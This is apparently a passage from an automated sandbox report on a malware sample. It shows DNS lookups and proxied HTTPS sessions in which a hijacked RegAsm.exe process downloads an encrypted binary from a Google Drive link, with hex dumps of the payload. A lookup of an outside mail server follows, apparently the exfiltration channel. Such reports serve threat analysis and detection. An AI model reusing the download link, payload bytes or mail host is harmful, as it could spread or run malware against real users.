                                      Sep 27, 2021 13:24:28.553793907 CEST53636481.1.1.1192.168.11.20
                                      Sep 27, 2021 13:24:29.259279966 CEST5674653192.168.11.201.1.1.1
                                      Sep 27, 2021 13:24:29.300307989 CEST53567461.1.1.1192.168.11.20
                                      Sep 27, 2021 13:24:51.745048046 CEST5095753192.168.11.201.1.1.1
                                      Sep 27, 2021 13:24:51.753462076 CEST53509571.1.1.1192.168.11.20
                                      Sep 27, 2021 13:24:52.279510021 CEST6401153192.168.11.201.1.1.1
                                      Sep 27, 2021 13:24:52.288184881 CEST53640111.1.1.1192.168.11.20
                                      Sep 27, 2021 13:24:52.639642954 CEST6273653192.168.11.201.1.1.1
                                      Sep 27, 2021 13:24:52.648876905 CEST53627361.1.1.1192.168.11.20
                                      Sep 27, 2021 13:24:53.215869904 CEST5548353192.168.11.201.1.1.1
                                      Sep 27, 2021 13:24:53.225626945 CEST53554831.1.1.1192.168.11.20
                                      Sep 27, 2021 13:24:54.273809910 CEST5266753192.168.11.201.1.1.1
                                      Sep 27, 2021 13:24:54.282218933 CEST53526671.1.1.1192.168.11.20
                                      Sep 27, 2021 13:25:26.589874983 CEST5765053192.168.11.201.1.1.1
                                      Sep 27, 2021 13:25:26.599205017 CEST53576501.1.1.1192.168.11.20
                                      Sep 27, 2021 13:25:26.761149883 CEST5601353192.168.11.201.1.1.1
                                      Sep 27, 2021 13:25:26.770432949 CEST53560131.1.1.1192.168.11.20
                                      Sep 27, 2021 13:25:48.790684938 CEST5080553192.168.11.201.1.1.1
                                      Sep 27, 2021 13:25:48.799277067 CEST53508051.1.1.1192.168.11.20
                                      Sep 27, 2021 13:25:51.417889118 CEST5601153192.168.11.201.1.1.1
                                      Sep 27, 2021 13:25:51.426635027 CEST53560111.1.1.1192.168.11.20
                                      Sep 27, 2021 13:25:54.914371014 CEST6298553192.168.11.201.1.1.1
                                      Sep 27, 2021 13:25:54.923122883 CEST53629851.1.1.1192.168.11.20
                                      Sep 27, 2021 13:26:05.598417997 CEST5494553192.168.11.201.1.1.1
                                      Sep 27, 2021 13:26:05.787492990 CEST53549451.1.1.1192.168.11.20
                                      Sep 27, 2021 13:26:18.800291061 CEST6527153192.168.11.201.1.1.1
                                      Sep 27, 2021 13:26:18.809010029 CEST53652711.1.1.1192.168.11.20
                                      Sep 27, 2021 13:28:18.835072994 CEST4983253192.168.11.201.1.1.1
                                      Sep 27, 2021 13:28:18.843777895 CEST53498321.1.1.1192.168.11.20
                                      Sep 27, 2021 13:30:18.876497984 CEST5797653192.168.11.201.1.1.1
                                      Sep 27, 2021 13:30:18.885379076 CEST53579761.1.1.1192.168.11.20
                                      Sep 27, 2021 13:30:53.476998091 CEST4938553192.168.11.201.1.1.1
                                      Sep 27, 2021 13:30:53.485809088 CEST53493851.1.1.1192.168.11.20
                                      Sep 27, 2021 13:30:53.899441957 CEST5169753192.168.11.201.1.1.1
                                      Sep 27, 2021 13:30:53.907819986 CEST53516971.1.1.1192.168.11.20

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                      Sep 27, 2021 13:24:28.545675039 CEST192.168.11.201.1.1.10x9757Standard query (0)drive.google.comA (IP address)IN (0x0001)
                                      Sep 27, 2021 13:24:29.259279966 CEST192.168.11.201.1.1.10x5f28Standard query (0)doc-10-50-docs.googleusercontent.comA (IP address)IN (0x0001)
                                      Sep 27, 2021 13:26:05.598417997 CEST192.168.11.201.1.1.10xf141Standard query (0)mail.reyesyasociados.comA (IP address)IN (0x0001)

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                      Sep 27, 2021 13:23:40.862291098 CEST1.1.1.1192.168.11.200x2fe0No error (0)devcenterapi.azure-api.netapimgmttmr17ij3jt5dneg64srod9jevcuajxaoube4brtu9cq.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                      Sep 27, 2021 13:23:40.862291098 CEST1.1.1.1192.168.11.200x2fe0No error (0)devcenterapi-eastus-01.regional.azure-api.netapimgmthszbjimgeglorvthkncixvpso9vnynvh3ehmsdll33a.cloudapp.netCNAME (Canonical name)IN (0x0001)
                                      Sep 27, 2021 13:24:28.553793907 CEST1.1.1.1192.168.11.200x9757No error (0)drive.google.com142.250.186.78A (IP address)IN (0x0001)
                                      Sep 27, 2021 13:24:29.300307989 CEST1.1.1.1192.168.11.200x5f28No error (0)doc-10-50-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                      Sep 27, 2021 13:24:29.300307989 CEST1.1.1.1192.168.11.200x5f28No error (0)googlehosted.l.googleusercontent.com142.250.185.225A (IP address)IN (0x0001)
                                      Sep 27, 2021 13:26:05.787492990 CEST1.1.1.1192.168.11.200xf141No error (0)mail.reyesyasociados.com109.169.39.245A (IP address)IN (0x0001)
                                      Sep 27, 2021 13:30:53.485809088 CEST1.1.1.1192.168.11.200xa7a5No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)

                                      HTTP Request Dependency Graph

                                      • drive.google.com
                                      • doc-10-50-docs.googleusercontent.com

                                      HTTPS Proxied Packets

                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      0192.168.11.2049720142.250.186.78443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                      TimestampkBytes transferredDirectionData
                                      2021-09-27 11:24:28 UTC0OUTGET /uc?export=download&id=1nGJiop3ZbSXKqDzRXrfCgNWu41bLoy9F HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                      Host: drive.google.com
                                      Cache-Control: no-cache
                                      2021-09-27 11:24:29 UTC0INHTTP/1.1 302 Moved Temporarily
                                      Content-Type: text/html; charset=UTF-8
                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                      Pragma: no-cache
                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                      Date: Mon, 27 Sep 2021 11:24:29 GMT
                                      Location: https://doc-10-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/aqln9ke6chkrap6m6ju294o2tb81ut9j/1632741825000/00519186742208262786/*/1nGJiop3ZbSXKqDzRXrfCgNWu41bLoy9F?e=download
                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                      Content-Security-Policy: script-src 'nonce-gzWjMB9y2tF8fPtzfjpcEg' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                      X-Content-Type-Options: nosniff
                                      X-Frame-Options: SAMEORIGIN
                                      X-XSS-Protection: 1; mode=block
                                      Server: GSE
                                      Set-Cookie: NID=511=OKJ2HZnhsGNFPuk19duyUj6SpYRhK_GRqZ5d4usR3H4t-8EJ12AApEfto7epuUZtGKx0zGm9aMq6PuVekAFOIJF0E-_T6T29xhlwwdjwCPqe-navFsEsDvLilKH1lxJZ133efbLZpzBd_3wraLYCWt5w2RwScCiKPysDGcsBBd8; expires=Tue, 29-Mar-2022 11:24:28 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                      Accept-Ranges: none
                                      Vary: Accept-Encoding
                                      Connection: close
                                      Transfer-Encoding: chunked
                                      2021-09-27 11:24:29 UTC1INData Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 31 30 2d 35 30 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 61 71 6c 6e
                                      Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-10-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/aqln
                                      2021-09-27 11:24:29 UTC1INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      1192.168.11.2049721142.250.185.225443C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                      TimestampkBytes transferredDirectionData
                                      2021-09-27 11:24:29 UTC1OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/aqln9ke6chkrap6m6ju294o2tb81ut9j/1632741825000/00519186742208262786/*/1nGJiop3ZbSXKqDzRXrfCgNWu41bLoy9F?e=download HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                      Cache-Control: no-cache
                                      Host: doc-10-50-docs.googleusercontent.com
                                      Connection: Keep-Alive
                                      2021-09-27 11:24:29 UTC2INHTTP/1.1 200 OK
                                      X-GUploader-UploadID: ADPycdtf8vAqRf9ZjgOcKTN3k-hPcgK8yixvr2fD7RUQTC-0hqTrZClB29HsM9lGHsM_BrsvADe0tfovxy67zjWz69D2nmmQ4Q
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Credentials: false
                                      Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout
                                      Access-Control-Allow-Methods: GET,OPTIONS
                                      Content-Type: application/octet-stream
                                      Content-Disposition: attachment;filename="chubz_usHjBfjwzs196.bin";filename*=UTF-8''chubz_usHjBfjwzs196.bin
                                      Date: Mon, 27 Sep 2021 11:24:29 GMT
                                      Expires: Mon, 27 Sep 2021 11:24:29 GMT
                                      Cache-Control: private, max-age=0
                                      X-Goog-Hash: crc32c=zXhz1w==
                                      Content-Length: 221760
                                      Server: UploadServer
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                      Connection: close
                                      2021-09-27 11:24:29 UTC5INData Raw: 8c 53 0b f4 82 5b 7a 34 16 76 6d 7d a1 e6 42 d4 62 8d 56 d9 df 91 9f 81 68 f6 0a 78 3e 48 79 2e 3f bc a1 83 a9 00 a9 dc 82 ed 1d 17 f7 2c b4 f3 37 29 65 ef 22 a2 73 c5 30 c3 8a f3 ad 10 84 8a 81 f4 5b 8b bc 94 a4 0c 26 b2 f4 bf d5 62 95 34 67 01 93 37 ac cd 09 d9 12 ec 30 17 91 f8 56 c1 74 ca 74 1e 0c 38 09 77 86 7b c9 42 c7 00 e1 f1 5b c1 39 94 cf 9f a0 96 f8 d8 81 62 b3 26 a9 16 03 6f 40 db 14 5b fd f0 83 15 ef 53 61 bf b9 12 7b d6 74 c8 8a ab e1 6c 20 0f 95 68 9c 45 e1 d7 fc 1e 06 6e fe a3 d3 ca a9 b5 a7 69 23 5a 9d e4 cc fb db 80 ed b5 4a 62 71 47 fd 67 fd 53 64 f2 ba 2f 55 42 7f ac 3a be db d2 e5 1b 60 ce 5f 4b 46 b0 5a ab 08 2e a9 1c 3a 0f 18 cb 3f 27 e0 c2 c1 97 bd 68 42 d8 ca 9a 8d f6 49 8d d3 1b 1c 72 93 47 18 bf 30 ea 06 ec 85 ed 59 4c e1 2f 19
                                      Data Ascii: S[z4vm}BbVhx>Hy.?,7)e"s0[&b4g70Vtt8w{B[9b&o@[Sa{tl hEni#ZJbqGgSd/UB:`_KFZ.:?'hBIrG0YL/
                                      2021-09-27 11:24:29 UTC9INData Raw: 1b 4d b7 65 12 61 09 1b a3 a1 94 1e 6a 41 f5 1f d5 52 71 2e 20 bd 89 75 80 0e 5f 4b 83 33 c5 bf 3a 9b 50 cf 10 19 79 51 ce d5 56 94 6c 83 0d a8 e2 46 25 08 18 14 e3 31 84 10 66 a1 40 17 13 d0 47 96 4a 68 e9 9d cd 15 7c 2a fa 9a 0a 9c a9 88 3d e4 8a c8 f5 dc 24 48 31 49 c2 55 97 7e 32 65 bb 7c 23 cd 79 8e 6f 62 b4 55 d4 e0 89 7a 5c 51 8d 21 bb 53 e0 25 16 e7 58 1c bc 10 9b 04 12 9f ed b7 14 d2 5f 8c 50 58 0f 9c af 39 90 5f a9 f2 52 17 62 69 e7 46 40 ec 09 8a 24 a5 f4 f3 ff 4b 75 c4 fe 37 ea c4 55 d1 f7 a8 a3 a8 22 ef 65 6b 48 91 46 ac 72 da 96 5b ed b6 0f 0c 27 b1 54 58 5b bc 98 b5 1a ed a6 df e5 e8 63 c0 18 57 84 59 87 7a 34 6d 7d 28 82 80 87 d2 5c fc c0 68 38 8b b3 a6 e9 9a bb 85 4c d2 6c ed 28 89 27 3a 90 ce c1 db 8f 5d 7b a1 a6 90 59 15 59 a0 d0 ed c8
                                      Data Ascii: MeajARq. u_K3:PyQVlF%1f@GJh|*=$H1IU~2e|#yobUz\Q!S%X_PX9_RbiF@$Ku7U"ekHFr['TX[cWYz4m}(\h8Ll(':]{YY
                                      2021-09-27 11:24:29 UTC12INData Raw: 6b 3d c6 c5 d0 99 00 58 32 8a 39 95 85 89 c4 3a 8a a3 3f d5 c5 d1 8a 21 33 50 0e cd 82 c6 82 a0 9d 8c 7d 20 b2 f2 1d 35 90 86 30 df 10 97 2f 52 cc 25 d2 4d fe bd 02 91 f8 57 cc 6d d9 70 1e 1d 3c 17 89 87 57 c5 4b dc 7e f9 f1 5b c5 9b 8b c6 8c a4 96 e9 dc 9e 75 cd 27 85 0c 0a 58 8e d7 14 e9 8a 21 a2 ad ea 61 b4 9e ed 7e 3a d9 54 b8 f2 cf 99 06 52 66 b5 1a f9 34 82 46 89 12 73 02 c1 db 8e a0 89 dc cf 26 fd 15 ce ce ce f5 bf e5 c9 1a 58 66 46 43 fd 76 f9 4c 6f 0c eb 46 59 4b 2d d3 21 be 7f b7 0a 65 6c dd 5b 4b 57 b4 45 be 16 2f 87 16 38 26 68 cb 3f 75 e8 dd d7 8c b9 68 53 dc d5 8c 4d 81 66 83 ad 26 1c 72 97 7e 65 bf 30 ea 59 fb 96 c9 59 5d e5 36 e7 79 35 4f 14 66 a4 65 c0 56 a3 e6 55 9e 90 1c 79 9d 6f 1d 11 28 76 fc 8c 15 a7 75 c0 01 7e 76 b6 5e 65 97 fa 2e
                                      Data Ascii: k=X29:?!3P} 50/R%MWmp<WK~[u'X!a~:TRf4Fs&XfFCvLoFYK-!el[KWE/8&h?uhSMf&r~e0YY]6y5OfeVUyo(vu~v^e.
                                      2021-09-27 11:24:29 UTC16INData Raw: 49 73 40 da c1 78 c9 67 ec c2 c7 b2 4c 32 fc 1d 34 c1 fa 84 16 03 e7 be 15 79 d1 47 0d 4a 68 e9 86 3b 63 19 3b fc f4 ac cf a9 82 20 32 c6 95 cc ec 33 60 1f 37 cc 5f 81 49 79 45 16 2a 23 cb 5b 49 66 11 eb 15 5f ea 9a 7e 5c 50 ca 1c b9 53 ec 1e d0 f4 5d 10 78 ad 87 28 14 97 91 a0 05 92 43 78 4a 50 07 b6 a1 19 3b 0a a9 f4 70 ec 4a 47 ef e4 57 a6 c0 b0 c8 90 f4 f5 e4 6a 73 02 fc 31 e6 c4 4a d1 f7 a8 df b9 64 dd 4d af 4a 90 68 aa 5a 4e 96 22 e7 88 44 0e 2d b7 7c 7f 5b be 92 4e 0b ef 24 f7 2b ea 63 c6 09 51 ac cf 87 d7 93 45 ab 30 82 86 ae ee 6c f9 ca dd 28 cb 9b 78 e9 9a a0 af 08 99 6c eb 0a da 14 3a 9a a0 07 dd a7 1d 43 37 ac ff 12 6b 57 aa d6 fe cb 04 34 8b ba 59 08 40 d0 2b 12 de f8 6b d4 d0 40 25 32 b8 ca 51 e0 0b 55 bc d2 57 f0 fc 21 06 e0 2f 47 1c 6d f8
                                      Data Ascii: Is@xgL24yGJh;c; 23`7_IyE*#[If_~\PS]x(CxJP;pJGWjs1JdMJhZN"D-|[N$+cQE0l(xl:C7kW4Y@+k@%2QUW!/Gm
                                      2021-09-27 11:24:29 UTC18INData Raw: ef 87 d9 6f 97 51 08 14 29 e7 e2 33 f9 e6 cf d3 d7 2b 8f a9 7e dc 7f 36 b2 b7 50 f4 ce 7b 4a 65 5a 81 cc a1 34 c9 80 af d6 3e 34 88 f4 f4 34 36 d7 6a f6 20 9c eb 29 ad d3 51 53 5d 06 12 96 76 90 d4 08 a3 3f 05 7f 4e 9d 11 c6 d2 43 49 86 52 01 5f bd 90 cd 1b 22 d0 35 90 2e 7e 8d fb ea 98 f7 3b 5a 5a b0 c8 21 64 c4 7e 28 c1 bb 06 85 fe 53 36 a5 30 8c a7 89 5e 3a 8c 0b 5c d1 c1 d1 9f 0d 69 5e f0 ca 86 9c 89 bf 92 cb 74 22 b2 fe 97 70 9f 95 32 f7 78 93 37 a6 de 4b cb 10 c4 6b 15 91 fe 7e bb 74 ca 7e 36 6a 3a 09 71 ae 07 c9 42 cd 28 21 f3 5b c7 11 bd cf 9f a6 be 92 da 81 64 1b 5c a9 16 0b ae f5 fd 23 ef f4 37 b6 be e9 37 94 9e ed 70 cc a5 40 ab ff ba 88 1e 41 66 a3 38 d3 30 a7 d3 8a 3e 62 23 1d d3 a6 a2 98 d9 a6 9a 67 15 c4 ec 6a 94 bf ef eb d4 45 68 53 6f da
                                      Data Ascii: oQ)3+~6P{JeZ4>446j )QS]v?NCIR_"5.~;ZZ!d~(S60^:\i^t"p2x7Kk~t~6j:qB(![d\#77p@Af80>b#gjEhSo
                                      2021-09-27 11:24:29 UTC19INData Raw: f5 42 56 2e 28 d8 c4 75 8e 04 58 5c fa 77 c5 bf 3f 9c 4f fd 65 56 79 50 c4 d2 7e d8 4b 89 0b c7 bc 46 25 02 2c 36 ae 33 8b 16 09 f0 5a 17 19 d6 28 c4 4a 68 a1 9b c5 61 48 2a fa 9b 35 c5 a9 88 38 cc c4 ca ef da 32 61 1f 49 c2 5f de 47 15 6d da 28 23 cd 1e 89 66 11 ee 55 d4 ea 80 7e 4d 54 e2 77 bb 53 96 3c 13 f6 53 16 62 20 18 22 14 96 8d e0 14 d2 4f 50 8e 53 07 b0 a9 31 66 02 a9 f2 56 cb 4a 47 42 4c 46 e6 db 98 0c 92 ee f3 f5 62 5b c6 fe 31 53 e6 6d d1 f9 a2 7d a8 e5 cf 65 6b 47 90 6e ac 68 d8 96 23 ed a0 80 0c d9 bb 54 58 28 bf 98 ec 7d a3 3d df e0 e8 63 c0 02 57 84 58 85 d7 99 6d b2 38 82 80 21 c8 6c f9 44 73 39 8b bd b3 e9 9a aa 87 64 9b 6c ed 22 fd b8 36 90 cf e3 dd a7 17 af ad ac ff 07 15 59 aa cc fa a7 2d f1 89 ba 5f d4 86 d0 2b 95 20 f9 15 5b dd 40
                                      Data Ascii: BV.(uX\w?OeVyP~KF%,63Z(JhaH*582aI_Gm(#fU~MTwS<Sb "OPS1fVJGBLFb[1Sm}ekGnh#TX(}=cWXm8!lDs9dl"6Y-_+ [@
                                      2021-09-27 11:24:29 UTC20INData Raw: ac c2 1c b4 8d e9 7a 03 a1 42 46 f9 e8 85 09 52 66 b5 1a f9 35 71 b9 a4 3c 4f 0e e6 a9 59 5b 76 d4 de 9f 6b 1d c7 4a 16 a6 2d f3 e9 a3 77 6c 55 c0 ff 67 fd 7b 64 f2 fb 42 8c 40 33 ab 33 cd a1 b2 a8 7c 73 c9 21 51 46 b0 5e 87 b9 3f ac 63 2a 0e 13 cf 50 9f e2 c2 c7 89 43 69 3c c3 ca 9a b7 96 b4 8c b3 17 2c 63 94 28 f9 be 30 ec 57 eb ea 2e 58 4c e7 3c 1e 50 c3 46 1d 78 cb 7a bb 71 a6 44 4d a5 4f 1e 68 9f 58 33 ef 29 50 9f 67 08 8f 03 42 1a 78 d4 ad 45 71 fc 25 3e 9c 54 e7 f1 90 63 d9 b5 8f 81 43 a2 7c 63 86 f4 d6 48 c1 1e a9 3c b8 d0 72 b5 f7 a8 0f c5 4e 3e e4 3e b4 42 70 98 00 a6 89 55 cc 2d df 35 6b c9 f0 82 cd a2 6d 1f 14 42 01 2b d4 a8 af ed a8 73 e6 cf 3f 82 f0 0b 04 02 e2 13 30 7b 4b 3e 90 86 e5 b1 15 12 3d 81 5a 56 d9 26 d9 29 04 3f a6 81 f6 85 01 f0
                                      Data Ascii: zBFRf5q<OY[vkJ-wlUg{dB@33|s!QF^?c*PCi<,c(0W.XL<PFxzqDMOhX3)PgBxEq%>TcC|cH<rN>>BpU-5kmB+s?0{K>=ZV&)?
                                      2021-09-27 11:24:29 UTC22INData Raw: 7f 39 ae 9b 84 e9 9a a0 8b 66 b3 93 ed 22 f7 07 3e b0 cf cf dd a7 9a 00 a1 ac fe 1f c5 25 aa d6 fb 8f 38 f1 89 b0 77 20 8b d0 21 11 ae 4e cd 62 c3 45 37 55 81 08 3c e1 0c 7d 7c db 46 ff 10 21 4e 8d 40 56 1d 63 38 09 8a 16 be a8 bf 26 0f d0 3b 35 7a 17 05 7d 95 0c e0 60 bb 8a 5a 95 8d 6e 76 33 56 59 08 12 88 f3 34 d4 7f fe 93 fb 50 8f da 76 f5 18 3e a1 b9 69 d8 a1 7a 4d 74 57 e7 0f a6 a1 ad 80 7c d5 3e 38 b1 d2 e7 3c 5f bc 13 f6 2a be 81 41 af d5 71 6a 29 69 c0 9c 5e b4 de 20 9d e2 88 75 90 92 28 f6 c3 4a 72 2d 69 3e 77 85 9a 13 11 e8 84 4d b4 2e 7f 99 e2 d9 ee df ac 5a 4c ac e0 b8 7e c4 78 38 dd e4 d0 85 6e 59 1e 81 1b 8c ad f7 ee 14 8e 01 24 cd bf f3 9b 25 28 74 0f cc ae c1 e4 d2 94 a4 06 2e cc d6 bf 2a 99 bd 72 df 01 95 1f a9 cc 09 d3 3d ea 31 17 9b f5
                                      Data Ascii: 9f">%8w !NbE7U<}|F!N@Vc8&;5z}`Znv3VY4Pv>izMtW|>8<_*Aqj)i^ u(Jr-i>wM.ZL~x8nY$%(t.*r=1
                                      2021-09-27 11:24:29 UTC23INData Raw: d9 2d 33 0a 14 46 7b 27 ae a8 ab cb 34 1c d5 d4 39 24 f6 28 00 02 d0 13 30 7b 67 98 96 aa cf 3b 4e 02 23 84 d5 42 14 5d a5 29 04 1e b4 f9 a6 f9 01 f4 80 56 71 c3 0a 6a 1a c7 9c 95 a5 1c 0b cf 64 ba 97 d5 ba 23 96 78 6a ea d4 16 08 1b 4d bb 08 47 21 e2 11 a4 b6 85 5f 6a 41 fb 30 1a 40 56 28 08 92 c4 75 8a 37 41 22 e4 7d c5 bb 18 6c 4d fd 79 7e 5d 51 c4 d8 fe d0 6e 83 0f 1a 4f 40 25 02 61 34 ae 33 80 3e 27 f2 40 11 0f ff 06 c4 4a 62 f5 aa 63 61 46 2a 84 93 65 cf ad f6 3f cc c4 ce 9a 13 32 60 15 37 ea 5f 81 49 7a a4 d4 28 29 17 0d ab 66 11 e5 3a 1d ea 9a 74 22 ba e2 77 b1 2d c2 36 13 f2 4b 3e 4c 20 92 22 02 b8 ed 9e 1c d2 55 54 f0 5a 07 b0 ad 5e 36 08 a9 f8 45 11 25 4f e4 46 4c ec d1 b0 fd 90 f4 f5 e3 4b 75 c6 fe 3b f6 12 6c c7 09 a3 03 a0 24 c5 61 15 40 90
                                      Data Ascii: -3F{'49$(0{g;N#B])Vqjd#xjMG!_jA0@V(u7A"}lMy~]QnO@%a43>'@JbcaF*e?2`7_Iz()f:t"w-6K>L "UTZ^6E%OFLKu;l$a@
                                      2021-09-27 11:24:29 UTC24INData Raw: 59 18 a9 14 8c ad ec 46 32 8c 01 26 1b 94 d3 9b 25 04 58 f0 cc a8 a4 82 be 94 ae 63 29 b3 f4 b5 02 99 95 34 d9 6e 9a 36 ac c7 66 d3 53 ec 3a 01 6f f9 09 c3 6b d8 8a 1f 1a c6 08 28 84 5b 6d 42 c7 00 1f f0 4d 3f 38 cb cd bf 05 96 f8 d8 7f 63 25 d8 a8 49 21 1a f8 59 6b ef f4 3c cd a1 ef 1f a6 f1 ea 7b 12 af 7c a8 fb c4 80 71 dc 62 b5 01 d1 3e 8d 34 f7 3e 64 0a b1 dd a7 a4 83 5c ee 49 67 11 13 1b a0 94 bf 9b cb b8 47 6c 7d 56 fe 67 fb 7b 40 f2 ea 60 d5 4a 33 ad 3d c0 77 b3 a8 7e 62 42 20 4b 46 b1 35 a7 e9 2e a1 35 15 0e 13 c1 bf 77 e3 c2 c5 8b 3d 4f 42 d8 ce 47 15 81 4a 8d d1 83 34 3f 93 47 1e 97 d3 e8 46 ea 93 e5 77 4c e1 27 0f 4b 00 3a 15 7e da 79 e8 b2 a5 44 4f a5 b0 1c 68 93 f0 1c ef 29 5e c8 ed 08 8f 05 c0 b9 50 99 a9 54 70 bb 1f 3d 9c 54 ee d0 33 76 d9
                                      Data Ascii: YF2&%Xc)4n6fS:ok([mBM?8c%I!Yk<{|qb>4>d\IgGl}Vg{@`J3=w~bB KF5.5w=OBGJ4?GFwL'K:~yDOh)^PTp=T3v
